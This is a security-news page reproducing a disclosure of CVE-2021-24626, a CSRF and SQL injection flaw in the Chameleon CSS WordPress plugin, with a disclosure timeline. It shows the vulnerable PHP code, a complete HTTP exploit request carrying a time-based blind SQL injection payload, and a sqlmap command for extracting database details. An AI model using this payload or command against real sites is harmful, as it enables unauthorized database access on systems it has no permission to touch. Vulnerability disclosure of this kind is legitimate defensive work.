Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-24626: wp-plugin : chameleon-css | Code Vigilant : to err is human.. To fix is Humanity

The Chameleon CSS WordPress plugin through 1.2 does not have any CSRF and capability checks in all its AJAX calls, allowing any authenticated user, such as subscriber to call them and perform unauthorised actions. One of AJAX call, remove_css, also does not sanitise or escape the css_id POST parameter before using it in a SQL statement, leading to a SQL Injection

CVE
#sql#csrf#web#windows#apple#wordpress#php#auth#chrome#webkit

Wp Plugin Chameleon Css

Plugin Details

Effected Version : 1.2 (and most probably lower version’s if any)

Minimum Level of Access Required : Subscriber

CVE Number : CVE-2021-24626

Disclosure Timeline

  • June 15, 2021: Issue Identified and Disclosed to WPScan

  • June 18, 2021 : Plugin Closed

  • August 13, 2021 : CVE Assigned

  • October 7, 2021 : Public Disclosure

Technical Details

The delete CSS functionality, Available to Subscriber role takes in POST parameter css_id and inserts it into the SQL statement without proper sanitization, validation or escaping therefore leads SQL Injection

Vulnerable_code: ccss-admin-ajax.php#L95

93:     $css_id = $_POST['css_id'];
94:
95:     $wpdb->query("DELETE FROM " . CCSS_TABLE_CCSS_INFO . " WHERE css_id = " . $css_id );

PoC Screenshot

Exploit

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 172.28.128.50
Content-Length: 35
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/options-general.php?page=ccss
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_logged_in_232395f24f6cff47569f2739c21385d6=subscriber%7C1624244165%7Cxe5o2eTJ0uh9Ez2EMcLPrjFJPGofcRA9ADRDuE9loVL%7C1af6cb0047d474ab4bd92318014b994dfd59f71abc2c6a75530625cb6ff43f47; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1623034566; wordpress_232395f24f6cff47569f2739c21385d6=subscriber%7C1624244165%7Cxe5o2eTJ0uh9Ez2EMcLPrjFJPGofcRA9ADRDuE9loVL%7Cf195a23a10b2277eac8258b184a76c0b8a3847b109dc492cf4f77c58ddad3b85; wordpress_232395f24f6cff47569f2739c21385d6=subscriber%7C1624244165%7Cxe5o2eTJ0uh9Ez2EMcLPrjFJPGofcRA9ADRDuE9loVL%7Cf195a23a10b2277eac8258b184a76c0b8a3847b109dc492cf4f77c58ddad3b85;

action=remove_css&css_id=1 AND (SELECT 7806 FROM (SELECT(SLEEP(5)))CVtK)

SQLMap Command

sqlmap -r chameleon_css.req --dbms mysql --current-user --current-db -b -p css_id --batch --flush-session

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907